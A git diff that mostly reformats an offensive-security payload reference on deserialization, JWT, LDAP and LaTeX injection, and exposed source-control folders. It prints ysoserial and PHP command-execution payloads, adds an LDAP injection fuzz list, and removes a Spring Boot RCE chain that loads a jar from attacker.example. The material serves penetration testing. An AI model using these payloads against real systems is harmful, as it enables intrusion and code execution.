diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md index ac2f3c1..152ade6 100644 --- a/Insecure Deserialization/DotNET.md +++ b/Insecure Deserialization/DotNET.md @@ -20,8 +20,11 @@ ## Detection -* `AAEAAD` (Hex) = .NET deserialization BinaryFormatter -* `FF01` (Hex) / `/w` (Base64) = .NET ViewState +| Data | Description | +| -------------- | ------------------- | +| `AAEAAD` (Hex) | .NET BinaryFormatter | +| `FF01` (Hex) | .NET ViewState | +| `/w` (Base64) | .NET ViewState | Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=` @@ -134,6 +137,7 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t ## POP Gadgets These gadgets must have the following properties: + * Serializable * Public/settable variables * Magic "functions": Get/Set, OnSerialisation, Constructors/Destructors diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index 95d37f8..09cd4d6 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md @@ -21,7 +21,7 @@ * `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol. * `00 05`: STREAM_VERSION. The serialization version. - `"rO0"` in Base64 -- Content-type = "application/x-java-serialized-object" +- `Content-Type` = "application/x-java-serialized-object" - `"H4sIAAAAAAAAAJ"` in gzip(base64) @@ -41,7 +41,7 @@ java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | b **List of payloads included in ysoserial:** | Payload | Authors | Dependencies | -| ------------------- | -------------------------------------- | --- | +| ------------------- | -------------------------------------- | --- | | AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 | | BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 | | C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 | @@ -136,7 +136,7 @@ Payload generators for the following marshallers are included: ## YAML Deserialization -SnakeYAML +SnakeYAML is a popular Java-based library used for parsing and emitting YAML (YAML Ain't Markup Language) data. It provides an easy-to-use API for working with YAML, a human-readable data serialization standard commonly used for configuration files and data exchange. ```yaml !!javax.script.ScriptEngineManager [ diff --git a/Insecure Deserialization/Node.md b/Insecure Deserialization/Node.md index a58dc8a..69116a6 100644 --- a/Insecure Deserialization/Node.md +++ b/Insecure Deserialization/Node.md @@ -14,6 +14,7 @@ ## Methodology * In Node source code, look for: + * `node-serialize` * `serialize-to-js` * `funcster` diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index c9c7f16..a07ad18 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md @@ -25,7 +25,6 @@ The following magic methods will help you for a PHP Object injection Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection. - Vulnerable code: ```php @@ -54,13 +53,15 @@ Vulnerable code: Craft a payload using existing code inside the application. -```php -# Basic serialized data -a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";} +* Basic serialized data + ```php + a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";} + ``` -# Command execution -string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}" -``` +* Command execution + ```php + string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}" + ``` ## Authentication Bypass @@ -88,6 +89,7 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;} Because `true == "str"` is true. + ## Object Injection Vulnerable code: @@ -130,7 +132,6 @@ Also called `"PHP POP Chains"`, they can be used to gain RCE on the system. * In PHP source code, look for `unserialize()` function. * Interesting [Magic Methods](https://www.php.net/manual/en/language.oop5.magic.php) such as `__construct()`, `__destruct()`, `__call()`, `__callStatic()`, `__get()`, `__set()`, `__isset()`, `__unset()`, `__sleep()`, `__wakeup()`, `__serialize()`, `__unserialize()`, `__toString()`, `__invoke()`, `__set_state()`, `__clone()`, and `__debugInfo()`: - * `__construct()`: PHP allows developers to declare constructor methods for classes. Classes which have a constructor method call this method on each newly-created object, so it is suitable for any initialization that the object may need before it is used. [php.net](https://www.php.net/manual/en/language.oop5.decon.php#object.construct) * `__destruct()`: The destructor method will be called as soon as there are no other references to a particular object, or in any order during the shutdown sequence. [php.net](https://www.php.net/manual/en/language.oop5.decon.php#object.destruct) * `__call(string $name, array $arguments)`: The `$name` argument is the name of the method being called. The `$arguments` argument is an enumerated array containing the parameters passed to the `$name`'ed method. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.call) diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index c4daa54..2d9d55e 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md @@ -4,18 +4,19 @@ ## Summary -* [Detection](#detection) -* [Pickle](#pickle) -* [PyYAML](#pyyaml) +* [Tools](#tools) +* [Methodology](#methodology) + * [Pickle](#pickle) + * [PyYAML](#pyyaml) * [References](#references) ## Tools -* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) +* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) - Serialized payload for deserialization RCE attack on python driven applications where pickle,PyYAML, ruamel.yaml or jsonpickle module is used for deserialization of serialized data. -## Detection +## Methodology In Python source code, look for these sinks: @@ -25,7 +26,7 @@ In Python source code, look for these sinks: * `jsonpickle.decode` -## Pickle +### Pickle The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. :warning: `import cPickle` will only work on Python 2 @@ -71,7 +72,7 @@ print("Your Evil Token : {}").format(evil_token) ``` -## PyYAML +### PyYAML YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures. @@ -98,7 +99,7 @@ state: !!python/tuple update: !!python/name:exec ``` -Since PyYaml version 6.0, the default loader for `load` has been switched to SafeLoader mitigating the risks against Remote Code Execution. [PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420) +Since PyYaml version 6.0, the default loader for `load` has been switched to SafeLoader mitigating the risks against Remote Code Execution. [PR #420 - Fix](https://github.com/yaml/pyyaml/issues/420) The vulnerable sinks are now `yaml.unsafe_load` and `yaml.load(input, Loader=yaml.UnsafeLoader)`. diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md index 306ee3c..b79765e 100644 --- a/Insecure Direct Object References/README.md +++ b/Insecure Direct Object References/README.md @@ -114,7 +114,7 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon **Examples** -* [TODO]() +* [TODO](#) ### IDOR Tips diff --git a/Insecure Management Interface/README.md b/Insecure Management Interface/README.md index 0c15c15..7fc5fea 100644 --- a/Insecure Management Interface/README.md +++ b/Insecure Management Interface/README.md @@ -7,103 +7,40 @@ ## Summary -* [Springboot-Actuator](#springboot-actuator) - * [Remote Code Execution via /env](#remote-code-execution-via-env) +* [Methodology](#methodology) * [References](#references) -## Springboot-Actuator +## Methodology -Actuator endpoints let you monitor and interact with your application. -Spring Boot includes a number of built-in endpoints and lets you add your own. -For example, the `/health` endpoint provides basic application health information. +Insecure Management Interface vulnerabilities arise when administrative interfaces of systems or applications are improperly secured, allowing unauthorized or malicious users to gain access, modify configurations, or exploit sensitive operations. These interfaces are often critical for maintaining, monitoring, and controlling systems and must be secured rigorously. -Some of them contains sensitive info such as : +* Lack of Authentication or Weak Authentication: + * Interfaces accessible without requiring credentials. + * Use of default or weak credentials (e.g., admin/admin). -- `/trace` - Displays trace information (by default the last 100 HTTP requests with headers). -- `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment). -- `/heapdump` - Builds and returns a heap dump from the JVM used by our application. -- `/dump` - Displays a dump of threads (including a stack trace). -- `/logfile` - Outputs the contents of the log file. -- `/mappings` - Shows all of the MVC controller mappings. + ```ps1 + nuclei -t http/default-logins -u https://example.com + ``` -These endpoints are enabled by default in Springboot 1.X. -Note: Sensitive endpoints will require a username/password when they are accessed over HTTP. +* Exposure to the Public Internet + ```ps1 + nuclei -t http/exposed-panels -u https://example.com + nuclei -t http/exposures -u https://example.com + ``` -Since Springboot 2.X only `/health` and `/info` are enabled by default. +* Sensitive data transmitted over plain HTTP or other unencrypted protocols -### Remote Code Execution via `/env` +**Examples**: -Spring is able to load external configurations in the YAML format. -The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks. -In other words, an attacker can gain remote code execution by loading a malicious config file. - - -#### Steps - -1. Generate a payload of SnakeYAML deserialization gadget. - -- Build malicious jar -```bash -git clone https://github.com/artsploit/yaml-payload.git -cd yaml-payload -# Edit the payload before executing the last commands (see below) -javac src/artsploit/AwesomeScriptEngineFactory.java -jar -cvf yaml-payload.jar -C src/ . -``` - -- Edit src/artsploit/AwesomeScriptEngineFactory.java - -```java -public AwesomeScriptEngineFactory() { - try { - Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE - } catch (IOException e) { - e.printStackTrace(); - } -} -``` - -- Create a malicious yaml config (yaml-payload.yml) - -```yaml -!!javax.script.ScriptEngineManager [ - !!java.net.URLClassLoader [[ - !!java.net.URL ["http://attacker.example/yaml-payload.jar"] - ]] -] -``` - - -2. Host the malicious files on your server. - -- yaml-payload.jar -- yaml-payload.yml - - -3. Change `spring.cloud.bootstrap.location` to your server. - -``` -POST /env HTTP/1.1 -Host: victim.example:8090 -Content-Type: application/x-www-form-urlencoded -Content-Length: 59 - -spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml -``` - -4. Reload the configuration. - -``` -POST /refresh HTTP/1.1 -Host: victim.example:8090 -Content-Type: application/x-www-form-urlencoded -Content-Length: 0 -``` +* **Network Devices**: Routers, switches, or firewalls with default credentials or unpatched vulnerabilities. +* **Web Applications**: Admin panels without authentication or exposed via predictable URLs (e.g., /admin). +* **Cloud Services**: API endpoints without proper authentication or overly permissive roles. ## References +- [CAPEC-121: Exploit Non-Production Interfaces - CAPEC - July 30, 2020](https://capec.mitre.org/data/definitions/121.html) - [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) - [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) \ No newline at end of file diff --git a/Insecure Source Code Management/Bazaar.md b/Insecure Source Code Management/Bazaar.md index 2b30553..afa221f 100644 --- a/Insecure Source Code Management/Bazaar.md +++ b/Insecure Source Code Management/Bazaar.md @@ -15,15 +15,16 @@ ### rip-bzr.pl -```powershell -wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl -docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u -``` +* [kost/dvcs-ripper/rip-bzr.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl) + ```powershell + docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u + ``` ### bzr_dumper +* [SeahunOh/bzr_dumper](https://github.com/SeahunOh/bzr_dumper) + ```powershell -git clone https://github.com/SeahunOh/bzr_dumper python3 dumper.py -u "http://127.0.0.1:5000/" -o source Created a standalone tree (format: 2a) [!] Target : http://127.0.0.1:5000/ @@ -38,8 +39,10 @@ Created a standalone tree (format: 2a) [+] GET branch/tag [+] GET b'154411f0f33adc3ff8cfb3d34209cbd1' [*] Finish +``` -$ bzr revert +```powershell +bzr revert N application.py N database.py N static/ diff --git a/Insecure Source Code Management/Git.md b/Insecure Source Code Management/Git.md index 3d29a07..17b47eb 100644 --- a/Insecure Source Code Management/Git.md +++ b/Insecure Source Code Management/Git.md @@ -27,9 +27,9 @@ The following examples will create either a copy of the .git or a copy of the cu Check for the following files, if they exist you can extract the .git folder. -- .git/config -- .git/HEAD -- .git/logs/HEAD +- `.git/config` +- `.git/HEAD` +- `.git/logs/HEAD` ### Recovering file contents from .git/logs/HEAD @@ -112,26 +112,29 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 #### git-dumper.py +* [arthaud/git-dumper](https://github.com/arthaud/git-dumper) ```powershell -git clone https://github.com/arthaud/git-dumper pip install -r requirements.txt ./git-dumper.py http://web.site/.git ~/website ``` #### diggit.py +* [bl4de/security-tools/diggit](https://github.com/bl4de/security-tools/) + ```powershell -git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] ./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 - --u is remote path, where .git folder exists --t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init) --o is a hash of particular Git object to download ``` +`-u` is remote path, where .git folder exists +`-t` is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (`cd /path/to/temp/folder && git init`) +`-o` is a hash of particular Git object to download + #### GoGitDumper +* [c-sto/gogitdumper](https://github.com/c-sto/gogitdumper) + ```powershell go get github.com/c-sto/gogitdumper gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/ @@ -141,8 +144,9 @@ git checkout #### rip-git +* [kost/dvcs-ripper](https://github.com/kost/dvcs-ripper) + ```powershell -git clone https://github.com/kost/dvcs-ripper perl rip-git.pl -v -u "http://web.site/.git/" git cat-file -p 07603070376d63d911f608120eb4b5489b507692 @@ -156,15 +160,17 @@ git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 #### GitHack +* [lijiejie/GitHack](https://github.com/lijiejie/GitHack) + ```powershell -git clone https://github.com/lijiejie/GitHack GitHack.py http://web.site/.git/ ``` #### GitTools +* [internetwache/GitTools](https://github.com/internetwache/GitTools) + ```powershell -git clone https://github.com/internetwache/GitTools ./gitdumper.sh http://target.tld/.git/ /tmp/destdir git checkout -- . ``` @@ -204,20 +210,20 @@ gitrob [options] target [target2] ... [targetN] > Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories. -```powershell -# Run gitleaks against a public repository -docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git +* Run gitleaks against a public repository + ```powershell + docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git + ``` -# Run gitleaks against a local repository already cloned into /tmp/ -docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks +* Run gitleaks against a local repository already cloned into /tmp/ + ```powershell + docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks + ``` -# Run gitleaks against a specific Github Pull request -docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000 - -or - -go get -u github.com/zricethezav/gitleaks -``` +* Run gitleaks against a specific Github Pull request + ```powershell + docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000 + ``` ## References diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md index 8daea7d..2af722b 100644 --- a/Insecure Source Code Management/README.md +++ b/Insecure Source Code Management/README.md @@ -6,10 +6,10 @@ ## Summary * [Methodology](#methodology) -* [Bazaar](./Bazaar.md) -* [Git](./Git.md) -* [Mercurial](./Mercurial.md) -* [Subversion](./Subversion.md) + * [Bazaar](./Bazaar.md) + * [Git](./Git.md) + * [Mercurial](./Mercurial.md) + * [Subversion](./Subversion.md) * [Labs](#labs) * [References](#references) @@ -43,6 +43,7 @@ location /.git { For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read. + ## Labs * [Root Me - Insecure Code Management](https://www.root-me.org/fr/Challenges/Web-Serveur/Insecure-Code-Management) diff --git a/Insecure Source Code Management/Subversion.md b/Insecure Source Code Management/Subversion.md index c55ba4b..33b8c11 100644 --- a/Insecure Source Code Management/Subversion.md +++ b/Insecure Source Code Management/Subversion.md @@ -5,14 +5,11 @@ ## Summary * [Tools](#tools) - * [svn-extractor](#svn-extractor) * [Methodology](#methodology) * [References](#references) ## Tools -### svn-extractor - * [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network. ```powershell python svn-extractor.py --url "url with .svn available" @@ -28,9 +25,10 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base ```powershell INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); ``` + 2. Download interesting files - * remove \$sha1\$ prefix - * add .svn-base postfix + * remove `$sha1$` prefix + * add `.svn-base` postfix * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case) * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index d25cb24..0242d35 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -7,8 +7,8 @@ - [Tools](#tools) - [JWT Format](#jwt-format) - - [Header](#header) - - [Payload](#payload) + - [Header](#header) + - [Payload](#payload) - [JWT Signature](#jwt-signature) - [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042) - [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644) @@ -17,10 +17,8 @@ - [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114) - [JWT Signature - Recover Public Key From Signed JWTs](#jwt-signature---recover-public-key-from-signed-jwts) - [JWT Secret](#jwt-secret) - - [Encode and Decode JWT with the secret](#encode-and-decode-jwt-with-the-secret) - - [Break JWT secret](#break-jwt-secret) - - [JWT tool](#jwt-tool) - - [Hashcat](#hashcat) + - [Encode and Decode JWT with the secret](#encode-and-decode-jwt-with-the-secret) + - [Break JWT secret](#break-jwt-secret) - [JWT Claims](#jwt-claims) - [JWT kid Claim Misuse](#jwt-kid-claim-misuse) - [JWKS - jku header injection](#jwks---jku-header-injection) @@ -150,7 +148,7 @@ Send a JWT with an incorrect signature, the endpoint might respond with an error * [jwt-dotnet/jwt: Critical Security Fix Required: You disclose the correct signature with each SignatureVerificationException... #61](https://github.com/jwt-dotnet/jwt/issues/61) * [CVE-2019-7644: Security Vulnerability in Auth0-WCF-Service-JWT](https://auth0.com/docs/secure/security-guidance/security-bulletins/cve-2019-7644) -``` +```ps1 Invalid signature. Expected SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c got 9twuPVu9Wj3PBneGw1ctrf3knr7RX12v-UwocfLhXIs Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgBOo= ``` @@ -161,16 +159,16 @@ Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application. None algorithm variants: -* none -* None -* NONE -* nOnE +* `none` +* `None` +* `NONE` +* `nOnE` To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT. However, this won't work unless you **remove** the signature Alternatively you can modify an existing JWT (be careful with the expiration time) -* Using [ticarpi/jwt_tool](#) +* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) ```ps1 python3 jwt_tool.py [JWT_HERE] -X a ``` @@ -207,7 +205,7 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256') :warning: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version: `pip install pyjwt==0.4.3`. -* Using [ticarpi/jwt_tool](#) +* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) ```ps1 python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem ``` @@ -258,16 +256,20 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256') **Exploit**: -* Using [ticarpi/jwt_tool] + +* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) + ```ps1 python3 jwt_tool.py [JWT_HERE] -X i ``` -* Using [portswigger/JWT Editor](#) + +* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd) 1. Add a `New RSA key` 2. In the JWT's Repeater tab, edit data 3. `Attack` > `Embedded JWK` **Deconstructed**: + ```json { "alg": "RS256", @@ -290,6 +292,7 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256') The RS256, RS384 and RS512 algorithms use RSA with PKCS#1 v1.5 padding as their signature scheme. This has the property that you can compute the public key given two different messages and accompanying signatures. [SecuraBV/jws2pubkey](https://github.com/SecuraBV/jws2pubkey): compute an RSA public key from two signed JWTs + ```ps1 $ docker run -it ttervoort/jws2pubkey JWS1 JWS2 $ docker run -it ttervoort/jws2pubkey "$(cat sample-jws/sample1.txt)" "$(cat sample-jws/sample2.txt)" | tee pubkey.jwk @@ -483,12 +486,12 @@ You should create your own key pair for this attack and host it. It should look **Exploit**: -* Using [ticarpi/jwt_tool] +* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) ```ps1 python3 jwt_tool.py JWT_HERE -X s python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json ``` -* Using [portswigger/JWT Editor](#) +* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd) 1. Generate a new RSA key and host it 2. Edit JWT's data 3. Replace the `kid` header with the one from your JWKS diff --git a/LDAP Injection/Intruder/LDAP_FUZZ_SMALL.txt b/LDAP Injection/Intruder/LDAP_FUZZ_SMALL.txt new file mode 100644 index 0000000..a888de3 --- /dev/null +++ b/LDAP Injection/Intruder/LDAP_FUZZ_SMALL.txt @@ -0,0 +1,20 @@ +* +*)(& +*))%00 +)(cn=))\x00 +*()|%26' +*()|&' +*(|(mail=*)) +*(|(objectclass=*)) +*)(uid=*))(|(uid=* +*/* +*| +/ +// +//* +@* +| +admin* +admin*)((|userpassword=*) +admin*)((|userPassword=*) +x' or name()='username' or 'x'='ys \ No newline at end of file diff --git a/LDAP Injection/README.md b/LDAP Injection/README.md index cdf2746..c01808c 100644 --- a/LDAP Injection/README.md +++ b/LDAP Injection/README.md @@ -6,20 +6,26 @@ ## Summary * [Methodology](#methodology) -* [Payloads](#payloads) -* [Blind Exploitation](#blind-exploitation) -* [Defaults attributes](#defaults-attributes) -* [Exploiting userPassword attribute](#exploiting-userpassword-attribute) + * [Authentication Bypass](#authentication-bypass) + * [Blind Exploitation](#blind-exploitation) +* [Defaults Attributes](#defaults-attributes) +* [Exploiting userPassword Attribute](#exploiting-userpassword-attribute) * [Scripts](#scripts) - * [Discover valid LDAP fields](#discover-valid-ldap-fields) - * [Special blind LDAP injection](#special-blind-ldap-injection) + * [Discover Valid LDAP Fields](#discover-valid-ldap-fields) + * [Special Blind LDAP Injection](#special-blind-ldap-injection) * [Labs](#labs) * [References](#references) ## Methodology -Example 1. +LDAP Injection is a vulnerability that occurs when user-supplied input is used to construct LDAP queries without proper sanitization or escaping + +### Authentication Bypass + +Attempt to manipulate the filter logic by injecting always-true conditions. + +**Example 1**: This LDAP query exploits logical operators in the query structure to potentially bypass authentication ```sql user = *)(uid=*))(|(uid=* @@ -27,7 +33,7 @@ pass = password query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==)) ``` -Example 2 +**Example 2**: This LDAP query exploits logical operators in the query structure to potentially bypass authentication ```sql user = admin)(!(&(1=0 @@ -35,34 +41,10 @@ pass = q)) query = (&(uid=admin)(!(&(1=0)(userPassword=q)))) ``` -## Payloads -```text -* -*)(& -*))%00 -)(cn=))\x00 -*()|%26' -*()|&' -*(|(mail=*)) -*(|(objectclass=*)) -*)(uid=*))(|(uid=* -*/* -*| -/ -// -//* -@* -| -admin* -admin*)((|userpassword=*) -admin*)((|userPassword=*) -x' or name()='username' or 'x'='y -``` +### Blind Exploitation -## Blind Exploitation - -We can extract using a bypass login +This scenario demonstrates LDAP blind exploitation using a technique similar to binary search or character-based brute-forcing to discover sensitive information like passwords. It relies on the fact that LDAP filters respond differently to queries based on whether the conditions match or not, without directly revealing the actual password. ```sql (&(sn=administrator)(password=*)) : OK @@ -82,8 +64,14 @@ We can extract using a bypass login (&(sn=administrator)(password=MYKE)) : OK ``` +**LDAP Filter Breakdown** -## Defaults attributes +* `&`: Logical AND operator, meaning all conditions inside must be true. +* `(sn=administrator)`: Matches entries where the sn (surname) attribute is administrator. +* `(password=X*)`: Matches entries where the password starts with X (case-sensitive). The asterisk (*) is a wildcard, representing any remaining characters. + + +## Defaults Attributes Can be used in an injection like `*)(ATTRIBUTE_HERE=*` @@ -100,7 +88,7 @@ commonName ``` -## Exploiting userPassword attribute +## Exploiting userPassword Attribute `userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18). @@ -115,7 +103,7 @@ userPassword:2.5.13.18:=\xx\xx\xx ## Scripts -### Discover valid LDAP fields +### Discover Valid LDAP Fields ```python #!/usr/bin/python3 @@ -136,7 +124,7 @@ for i in world: print(fields) ``` -### Special blind LDAP injection (without "*") +### Special Blind LDAP Injection ```python #!/usr/bin/python3 @@ -176,7 +164,6 @@ end ``` - ## Labs * [Root Me - LDAP injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Authentication) diff --git a/LaTeX Injection/README.md b/LaTeX Injection/README.md index 3d670ec..f884d9d 100644 --- a/LaTeX Injection/README.md +++ b/LaTeX Injection/README.md @@ -10,6 +10,7 @@ * [Write File](#write-file) * [Command Execution](#command-execution) * [Cross Site Scripting](#cross-site-scripting) +* [Labs](#labs) * [References](#references) @@ -121,7 +122,7 @@ From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) \href{javascript:alert(1)}{placeholder} ``` -in [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.html) +In [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.html) ```tex \unicode{} @@ -131,7 +132,7 @@ in [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.htm ## Labs * [Root Me - LaTeX - Input](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Input) -* [Root Me - LaTeX - Command execution](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Command-execution) +* [Root Me - LaTeX - Command Execution](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Command-execution) ## References